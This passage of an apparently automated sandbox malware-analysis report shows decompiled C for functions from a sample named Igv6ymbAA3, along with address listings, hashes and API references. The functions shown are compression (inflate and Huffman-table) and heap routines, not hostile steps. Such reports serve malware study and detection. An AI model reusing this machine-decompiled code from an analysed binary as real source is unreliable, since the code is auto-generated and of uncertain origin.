														_v122 =  *((intOrPtr*)(_t254 + _v88));
													}
												} else {
													_v124 = 0;
													_v122 = _t225;
												}
												_t226 = _v80;
												_v72 = _t226;
												_t336 = (_t353 >> _t265) + _t226;
												__eflags = _t336;
												_t281 = _v108 + _t336 * 4;
												_t337 = _v124;
												goto L53;
											} else {
												L63:
												_t348 = _v76 & _t353;
												_v68 = _t348;
												__eflags = _t348 - _v84;
												if(_t348 == _v84) {
													continue;
												} else {
													L64:
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 = _v120;
													}
													_v108 = _v108 + _v72 * 4;
													_t285 = _v116 - _t265;
													_t318 = _t265 + _t285;
													_t233 = 1 << _t285;
													__eflags = _t318 - _v112;
													if(_t318 < _v112) {
														_t350 = _t354 + 0x4c + _t318 * 2;
														while(1) {
															_t240 = _t233 - ( *_t350 & 0x0000ffff);
															__eflags = _t240;
															if(_t240 <= 0) {
																break;
															}
															_t318 = _t318 + 1;
															_t285 = _t285 + 1;
															_t350 =  &(_t350[1]);
															_t233 = _t240 + _t240;
															__eflags = _t318 - _v112;
															if(_t318 < _v112) {
																continue;
															}
															break;
														}
														_t348 = _v68;
													}
													_v100 = _v100 + 1;
													__eflags = _a4 - 1;
													_v80 = 1 << _t285;
													if(_a4 != 1) {
														L73:
														_t319 = _t348;
														_t349 = _a16;
														 *( *_t349 + _t319 * 4) = _t285;
														 *((char*)( *_t349 + 1 + _t319 * 4)) = _v120;
														_v84 = _t319;
														 *((short*)( *_t349 + 2 + _t319 * 4)) = _v108 -  *_t349 >> 2;
														continue;
														do {
															do {
																goto L47;
															} while (_t316 <= _v120);
															goto L63;
														} while (_t348 == _v84);
														goto L64;
													} else {
														__eflags = _v100 - 0x5b0;
														if(_v100 >= 0x5b0) {
															goto L84;
														} else {
															goto L73;
														}
													}
												}
											}
										} else {
											__eflags = _t316 - _v112;
											if(_t316 == _v112) {
												_t340 = _a16;
												_v124 = 0x40;
												_v123 = _t316 - _t265;
												_v122 = 0;
												__eflags = _t353;
												if(_t353 != 0) {
													_t351 = _v108;
													do {
														__eflags = _t265;
														if(_t265 != 0) {
															__eflags = (_v76 & _t353) - _v84;
															if((_v76 & _t353) != _v84) {
																_t251 = _v120;
																_t351 =  *_t340;
																_t265 = 0;
																__eflags = 0;
																_v116 = _t251;
																_v123 = _t251;
																_t316 = _t251;
															}
														}
														 *((intOrPtr*)(_t351 + (_t353 >> _t265) * 4)) = _v124;
														_t248 = 1 << _t316 - 1;
														__eflags = _t353 & 0x00000001;
														if((_t353 & 0x00000001) != 0) {
															do {
																_t248 = _t248 >> 1;
																__eflags = _t353 & _t248;
															} while ((_t353 & _t248) != 0);
														}
														__eflags = _t248;
														if(_t248 != 0) {
															goto L82;
														}
														goto L83;
														L82:
														_t203 = _t248 - 1; // 0x0
														_t297 = (_t203 & _t353) + _t248;
														__eflags = _t297;
														_t353 = _t297;
													} while (_t297 != 0);
												}
												L83:
												 *_t340 =  *_t340 + _v100 * 4;
												 *_a20 = _v120;
												__eflags = 0;
												return 0;
											} else {
												_t299 =  *(_a8 + ( *_v104 & 0x0000ffff) * 2) & 0x0000ffff;
												_v116 = _t299;
												_t316 = _t299;
												goto L62;
											}
										}
										goto L85;
									}
								} else {
									__eflags = _t223 - 0x5b0;
									if(_t223 >= 0x5b0) {
										L84:
										return 1;
									} else {
										goto L46;
									}
								}
							} else {
								__eflags = _t333;
								if(_t333 == 0) {
									L30:
									_t260 = _t213 | 0xffffffff;
									__eflags = _t260;
									return _t260;
								} else {
									__eflags = _t263 - 1;
									if(_t263 == 1) {
										goto L32;
									} else {
										goto L30;
									}
								}
							}
						}
						goto L85;
					}
					_t214 = _t213 | 0xffffffff;
					__eflags = _t214;
					return _t214;
				} else {
					_t261 = _a16;
					_v122 = 0;
					_v124 = 0x40;
					_v123 = 1;
					_t305 = _v124;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *_t343 = 1;
					return 0;
				}
				L85:
			}













































































                                                                                                                                                                      0x00408c60
                                                                                                                                                                      0x00408c63
                                                                                                                                                                      0x00408c78
                                                                                                                                                                      0x00408c7f
                                                                                                                                                                      0x00408c83
                                                                                                                                                                      0x00408c87
                                                                                                                                                                      0x00408c8b
                                                                                                                                                                      0x00408c8f
                                                                                                                                                                      0x00408c93
                                                                                                                                                                      0x00408c97
                                                                                                                                                                      0x00408c9b
                                                                                                                                                                      0x00408c9f
                                                                                                                                                                      0x00408ca4
                                                                                                                                                                      0x00408cb0
                                                                                                                                                                      0x00408cb5
                                                                                                                                                                      0x00408cbe
                                                                                                                                                                      0x00408cbf
                                                                                                                                                                      0x00408cb0
                                                                                                                                                                      0x00408cc3
                                                                                                                                                                      0x00408cca
                                                                                                                                                                      0x00408ccc
                                                                                                                                                                      0x00408cd0
                                                                                                                                                                      0x00408cd5
                                                                                                                                                                      0x00408cdd
                                                                                                                                                                      0x00408ce1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408ce1
                                                                                                                                                                      0x00408ce3
                                                                                                                                                                      0x00408ce9
                                                                                                                                                                      0x00408ceb
                                                                                                                                                                      0x00408ceb
                                                                                                                                                                      0x00408cf1
                                                                                                                                                                      0x00408d2c
                                                                                                                                                                      0x00408d31
                                                                                                                                                                      0x00408d31
                                                                                                                                                                      0x00408d37
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d39
                                                                                                                                                                      0x00408d3f
                                                                                                                                                                      0x00408d63
                                                                                                                                                                      0x00408d41
                                                                                                                                                                      0x00408d41
                                                                                                                                                                      0x00408d47
                                                                                                                                                                      0x00408d66
                                                                                                                                                                      0x00408d49
                                                                                                                                                                      0x00408d49
                                                                                                                                                                      0x00408d4f
                                                                                                                                                                      0x00408d6b
                                                                                                                                                                      0x00408d51
                                                                                                                                                                      0x00408d51
                                                                                                                                                                      0x00408d57
                                                                                                                                                                      0x00408d70
                                                                                                                                                                      0x00408d70
                                                                                                                                                                      0x00408d59
                                                                                                                                                                      0x00408d59
                                                                                                                                                                      0x00408d5c
                                                                                                                                                                      0x00408d5f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d61
                                                                                                                                                                      0x00408d5f
                                                                                                                                                                      0x00408d57
                                                                                                                                                                      0x00408d4f
                                                                                                                                                                      0x00408d47
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d3f
                                                                                                                                                                      0x00408d73
                                                                                                                                                                      0x00408d77
                                                                                                                                                                      0x00408d79
                                                                                                                                                                      0x00408d79
                                                                                                                                                                      0x00408d7d
                                                                                                                                                                      0x00408d82
                                                                                                                                                                      0x00408d84
                                                                                                                                                                      0x00408d8b
                                                                                                                                                                      0x00408d8b
                                                                                                                                                                      0x00408d8d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d8f
                                                                                                                                                                      0x00408d90
                                                                                                                                                                      0x00408d93
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d95
                                                                                                                                                                      0x00408d96
                                                                                                                                                                      0x00408d9d
                                                                                                                                                                      0x00408d9f
                                                                                                                                                                      0x00408dbf
                                                                                                                                                                      0x00408dc1
                                                                                                                                                                      0x00408dc6
                                                                                                                                                                      0x00408dd0
                                                                                                                                                                      0x00408dd5
                                                                                                                                                                      0x00408dda
                                                                                                                                                                      0x00408ddd
                                                                                                                                                                      0x00408de2
                                                                                                                                                                      0x00408de2
                                                                                                                                                                      0x00408de7
                                                                                                                                                                      0x00408dee
                                                                                                                                                                      0x00408df0
                                                                                                                                                                      0x00408df2
                                                                                                                                                                      0x00408df4
                                                                                                                                                                      0x00408df4
                                                                                                                                                                      0x00408dfa
                                                                                                                                                                      0x00408e0d
                                                                                                                                                                      0x00408e11
                                                                                                                                                                      0x00408e16
                                                                                                                                                                      0x00408e16
                                                                                                                                                                      0x00408e16
                                                                                                                                                                      0x00408e1b
                                                                                                                                                                      0x00408e1f
                                                                                                                                                                      0x00408e20
                                                                                                                                                                      0x00408e20
                                                                                                                                                                      0x00408df4
                                                                                                                                                                      0x00408e26
                                                                                                                                                                      0x00408e26
                                                                                                                                                                      0x00408e2e
                                                                                                                                                                      0x00408e6d
                                                                                                                                                                      0x00408e74
                                                                                                                                                                      0x00408e78
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408e30
                                                                                                                                                                      0x00408e30
                                                                                                                                                                      0x00408e33
                                                                                                                                                                      0x00408e55
                                                                                                                                                                      0x00408e5e
                                                                                                                                                                      0x00408e63
                                                                                                                                                                      0x00408e80
                                                                                                                                                                      0x00408e80
                                                                                                                                                                      0x00408e35
                                                                                                                                                                      0x00408e35
                                                                                                                                                                      0x00408e3d
                                                                                                                                                                      0x00408e45
                                                                                                                                                                      0x00408e45
                                                                                                                                                                      0x00408e33
                                                                                                                                                                      0x00408e8d
                                                                                                                                                                      0x00408e9a
                                                                                                                                                                      0x00408e9c
                                                                                                                                                                      0x00408ea0
                                                                                                                                                                      0x00408ea2
                                                                                                                                                                      0x00408ea4
                                                                                                                                                                      0x00408ea7
                                                                                                                                                                      0x00408eab
                                                                                                                                                                      0x00408eaf
                                                                                                                                                                      0x00408eb3
                                                                                                                                                                      0x00408eb7
                                                                                                                                                                      0x00408eba
                                                                                                                                                                      0x00408ec7
                                                                                                                                                                      0x00408ece
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00408ed6
                                                                                                                                                                      0x00408eda
                                                                                                                                                                      0x00408ee3
                                                                                                                                                                      0x00408eea
                                                                                                                                                                      0x00408eec
                                                                                                                                                                      0x00408efa
                                                                                                                                                                      0x00408f1b
                                                                                                                                                                      0x00408f1d
                                                                                                                                                                      0x00408f22
                                                                                                                                                                      0x00408efc
                                                                                                                                                                      0x00408f03
                                                                                                                                                                      0x00408f10
                                                                                                                                                                      0x00408f14
                                                                                                                                                                      0x00408f14
                                                                                                                                                                      0x00408eee
                                                                                                                                                                      0x00408eee
                                                                                                                                                                      0x00408ef3
                                                                                                                                                                      0x00408ef3
                                                                                                                                                                      0x00408f2b
                                                                                                                                                                      0x00408f42
                                                                                                                                                                      0x00408f4d
                                                                                                                                                                      0x00408f4d
                                                                                                                                                                      0x00408f4f
                                                                                                                                                                      0x00408f52
                                                                                                                                                                      0x00408f56
                                                                                                                                                                      0x00408f56
                                                                                                                                                                      0x00408f56
                                                                                                                                                                      0x00408f58
                                                                                                                                                                      0x00408f5a
                                                                                                                                                                      0x00408f5c
                                                                                                                                                                      0x00408f5c
                                                                                                                                                                      0x00408f60
                                                                                                                                                                      0x00408f6c
                                                                                                                                                                      0x00408f6e
                                                                                                                                                                      0x00408f70
                                                                                                                                                                      0x00408f72
                                                                                                                                                                      0x00408f72
                                                                                                                                                                      0x00408f74
                                                                                                                                                                      0x00408f74
                                                                                                                                                                      0x00408f72
                                                                                                                                                                      0x00408f78
                                                                                                                                                                      0x00408f7a
                                                                                                                                                                      0x00408f87
                                                                                                                                                                      0x00408f87
                                                                                                                                                                      0x00408f7c
                                                                                                                                                                      0x00408f7c
                                                                                                                                                                      0x00408f83
                                                                                                                                                                      0x00408f83
                                                                                                                                                                      0x00408f89
                                                                                                                                                                      0x00408f93
                                                                                                                                                                      0x00408f9d
                                                                                                                                                                      0x00408fa0
                                                                                                                                                                      0x00408fc4
                                                                                                                                                                      0x00408fc4
                                                                                                                                                                      0x00408fc8
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00408ed6
                                                                                                                                                                      0x00408eda
                                                                                                                                                                      0x00408ee3
                                                                                                                                                                      0x00408eea
                                                                                                                                                                      0x00408eec
                                                                                                                                                                      0x00408efa
                                                                                                                                                                      0x00408f1b
                                                                                                                                                                      0x00408f1d
                                                                                                                                                                      0x00408f22
                                                                                                                                                                      0x00408efc
                                                                                                                                                                      0x00408f03
                                                                                                                                                                      0x00408f10
                                                                                                                                                                      0x00408f14
                                                                                                                                                                      0x00408f14
                                                                                                                                                                      0x00408eee
                                                                                                                                                                      0x00408eee
                                                                                                                                                                      0x00408ef3
                                                                                                                                                                      0x00408ef3
                                                                                                                                                                      0x00408f2b
                                                                                                                                                                      0x00408f42
                                                                                                                                                                      0x00408f4d
                                                                                                                                                                      0x00408f4d
                                                                                                                                                                      0x00408f4f
                                                                                                                                                                      0x00408f52
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408fce
                                                                                                                                                                      0x00408fce
                                                                                                                                                                      0x00408fd2
                                                                                                                                                                      0x00408fd4
                                                                                                                                                                      0x00408fd8
                                                                                                                                                                      0x00408fdc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408fe2
                                                                                                                                                                      0x00408fe2
                                                                                                                                                                      0x00408fe2
                                                                                                                                                                      0x00408fe4
                                                                                                                                                                      0x00408fe6
                                                                                                                                                                      0x00408fe6
                                                                                                                                                                      0x00408ff5
                                                                                                                                                                      0x00408ffd
                                                                                                                                                                      0x00409004
                                                                                                                                                                      0x00409007
                                                                                                                                                                      0x00409009
                                                                                                                                                                      0x0040900d
                                                                                                                                                                      0x0040900f
                                                                                                                                                                      0x00409013
                                                                                                                                                                      0x00409016
                                                                                                                                                                      0x00409018
                                                                                                                                                                      0x0040901a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040901c
                                                                                                                                                                      0x0040901d
                                                                                                                                                                      0x0040901e
                                                                                                                                                                      0x00409021
                                                                                                                                                                      0x00409023
                                                                                                                                                                      0x00409027
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409027
                                                                                                                                                                      0x00409029
                                                                                                                                                                      0x00409029
                                                                                                                                                                      0x00409034
                                                                                                                                                                      0x00409038
                                                                                                                                                                      0x00409040
                                                                                                                                                                      0x00409044
                                                                                                                                                                      0x00409054
                                                                                                                                                                      0x00409054
                                                                                                                                                                      0x00409056
                                                                                                                                                                      0x0040905f
                                                                                                                                                                      0x00409068
                                                                                                                                                                      0x00409077
                                                                                                                                                                      0x0040907b
                                                                                                                                                                      0x00409080
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408ed2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409046
                                                                                                                                                                      0x00409046
                                                                                                                                                                      0x0040904e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040904e
                                                                                                                                                                      0x00409044
                                                                                                                                                                      0x00408fdc
                                                                                                                                                                      0x00408fa2
                                                                                                                                                                      0x00408fa2
                                                                                                                                                                      0x00408fa6
                                                                                                                                                                      0x00409085
                                                                                                                                                                      0x00409092
                                                                                                                                                                      0x00409097
                                                                                                                                                                      0x0040909b
                                                                                                                                                                      0x004090a0
                                                                                                                                                                      0x004090a2
                                                                                                                                                                      0x004090a4
                                                                                                                                                                      0x004090a8
                                                                                                                                                                      0x004090a8
                                                                                                                                                                      0x004090aa
                                                                                                                                                                      0x004090b2
                                                                                                                                                                      0x004090b6
                                                                                                                                                                      0x004090b8
                                                                                                                                                                      0x004090bc
                                                                                                                                                                      0x004090be
                                                                                                                                                                      0x004090be
                                                                                                                                                                      0x004090c0
                                                                                                                                                                      0x004090c4
                                                                                                                                                                      0x004090c8
                                                                                                                                                                      0x004090c8
                                                                                                                                                                      0x004090b6
                                                                                                                                                                      0x004090d4
                                                                                                                                                                      0x004090df
                                                                                                                                                                      0x004090e1
                                                                                                                                                                      0x004090e3
                                                                                                                                                                      0x004090e5
                                                                                                                                                                      0x004090e5
                                                                                                                                                                      0x004090e7
                                                                                                                                                                      0x004090e7
                                                                                                                                                                      0x004090e5
                                                                                                                                                                      0x004090eb
                                                                                                                                                                      0x004090ed
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004090ef
                                                                                                                                                                      0x004090ef
                                                                                                                                                                      0x004090f4
                                                                                                                                                                      0x004090f4
                                                                                                                                                                      0x004090f6
                                                                                                                                                                      0x004090f6
                                                                                                                                                                      0x004090a8
                                                                                                                                                                      0x004090fa
                                                                                                                                                                      0x0040910c
                                                                                                                                                                      0x00409115
                                                                                                                                                                      0x00409117
                                                                                                                                                                      0x0040911d
                                                                                                                                                                      0x00408fac
                                                                                                                                                                      0x00408fba
                                                                                                                                                                      0x00408fbe
                                                                                                                                                                      0x00408fc2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408fc2
                                                                                                                                                                      0x00408fa6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408fa0
                                                                                                                                                                      0x00408ebc
                                                                                                                                                                      0x00408ebc
                                                                                                                                                                      0x00408ec1
                                                                                                                                                                      0x0040911e
                                                                                                                                                                      0x0040912a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408ec1
                                                                                                                                                                      0x00408da1
                                                                                                                                                                      0x00408da1
                                                                                                                                                                      0x00408da3
                                                                                                                                                                      0x00408daa
                                                                                                                                                                      0x00408dad
                                                                                                                                                                      0x00408dad
                                                                                                                                                                      0x00408db4
                                                                                                                                                                      0x00408da5
                                                                                                                                                                      0x00408da5
                                                                                                                                                                      0x00408da8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408da8
                                                                                                                                                                      0x00408da3
                                                                                                                                                                      0x00408d9f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408d93
                                                                                                                                                                      0x00408db7
                                                                                                                                                                      0x00408db7
                                                                                                                                                                      0x00408dbe
                                                                                                                                                                      0x00408cf3
                                                                                                                                                                      0x00408cf3
                                                                                                                                                                      0x00408cfc
                                                                                                                                                                      0x00408d03
                                                                                                                                                                      0x00408d08
                                                                                                                                                                      0x00408d0d
                                                                                                                                                                      0x00408d11
                                                                                                                                                                      0x00408d13
                                                                                                                                                                      0x00408d18
                                                                                                                                                                      0x00408d1a
                                                                                                                                                                      0x00408d1d
                                                                                                                                                                      0x00408d2b
                                                                                                                                                                      0x00408d2b
                                                                                                                                                                      0x00000000

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: @$@
                                                                                                                                                                      • API String ID: 0-149943524
                                                                                                                                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                      • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                      • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}





                                                                                                                                                                      0x0040adb3
                                                                                                                                                                      0x0040adb5
                                                                                                                                                                      0x0040adb8
                                                                                                                                                                      0x0040adc0
                                                                                                                                                                      0x0040adc8
                                                                                                                                                                      0x0040adc8
                                                                                                                                                                      0x0040adce
                                                                                                                                                                      0x0040add0
                                                                                                                                                                      0x0040add8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ade1
                                                                                                                                                                      0x0040add8
                                                                                                                                                                      0x0040ade8

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004123F1() {

				SetUnhandledExceptionFilter(E004123AF);
				return 0;
			}



                                                                                                                                                                      0x004123f6
                                                                                                                                                                      0x004123fe

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 02422658 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(004123AF), ref: 0242265D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                      • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                      • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407C3F Relevance: .8, Instructions: 783COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                      			E00407C3F(unsigned int __ebx, signed char* __edx, signed int* __edi, signed int __esi) {
				signed int _t623;
				signed int _t626;
				signed char** _t637;
				signed int _t645;
				signed int _t649;
				signed int _t654;
				signed int _t657;
				signed int _t660;
				signed int _t662;
				signed int _t665;
				signed char _t771;
				signed char _t776;
				signed char _t778;
				signed int _t783;
				signed int _t785;
				signed int _t792;
				signed int _t795;
				signed int _t799;
				signed int _t803;
				signed int _t805;
				signed int _t813;
				unsigned int _t814;
				signed int _t815;
				signed int _t816;
				void* _t824;
				unsigned int _t828;
				unsigned int _t829;
				intOrPtr _t961;
				signed char _t962;
				signed char _t968;
				signed char _t974;
				signed char* _t989;
				signed char* _t998;
				signed int* _t1018;
				signed int _t1023;
				signed char** _t1025;
				signed char* _t1029;
				void* _t1032;
				void* _t1036;

				L0:
				while(1) {
					L0:
					_t1023 = __esi;
					_t1018 = __edi;
					_t989 = __edx;
					_t814 = __ebx;
					if(__esi >= 0xe) {
						goto L154;
					}
					L152:
					while(__edx != 0) {
						__eax =  *__ebp & 0x000000ff;
						__eax = ( *__ebp & 0x000000ff) << __cl;
						__edx = __edx - 1;
						__esi = __esi + 8;
						__ebp =  &(__ebp[1]);
						__ebx = __ebx + __eax;
						 *(__esp + 0x10) = __edx;
						if(__esi < 0xe) {
							continue;
						} else {
							goto L154;
						}
						L321:
					}
					L303:
					_t637 =  *(_t1036 + 0x40);
					_t637[3] =  *(_t1036 + 0x24);
					_t637[4] =  *(_t1036 + 0x18);
					 *_t637 = _t1029;
					_t637[1] = _t998;
					_t1018[0xe] = _t814;
					_t1018[0xf] = _t1023;
					if(_t1018[0xa] != 0 ||  *_t1018 < 0x18 &&  *(_t1036 + 0x28) != _t637[4]) {
						L306:
						if(E004072B0( *(_t1036 + 0x28),  *(_t1036 + 0x40)) == 0) {
							goto L309;
						} else {
							L307:
							 *_t1018 = 0x1c;
							L308:
							return 0xfffffffc;
						}
					} else {
						L309:
						_t1025 =  *(_t1036 + 0x40);
						_t1032 =  *((intOrPtr*)(_t1036 + 0x38)) - _t1025[1];
						_t824 =  *(_t1036 + 0x28) - _t1025[4];
						_t1025[2] =  &(_t1025[2][_t1032]);
						_t1025[5] =  &(_t1025[5][_t824]);
						_t1018[7] = _t1018[7] + _t824;
						if(_t1018[2] != 0 && _t824 != 0) {
							_push(_t824);
							if(_t1018[4] == 0) {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E004024A0();
							} else {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E00403080();
							}
							_t1018[6] = _t649;
							_t1036 = _t1036 + 0xc;
							_t1025[0xc] = _t649;
						}
						asm("sbb edx, edx");
						_t1025[0xb] = ( ~(_t1018[1]) & 0x00000040) + ((0 |  *_t1018 != 0x0000000b) - 0x00000001 & 0x00000080) + _t1018[0xf];
						if(_t1032 != 0 || _t824 != 0) {
							L317:
							if( *((intOrPtr*)(_t1036 + 0x44)) != 4) {
								L320:
								return  *(_t1036 + 0x30);
							} else {
								goto L318;
							}
						} else {
							L318:
							_t645 =  *(_t1036 + 0x30);
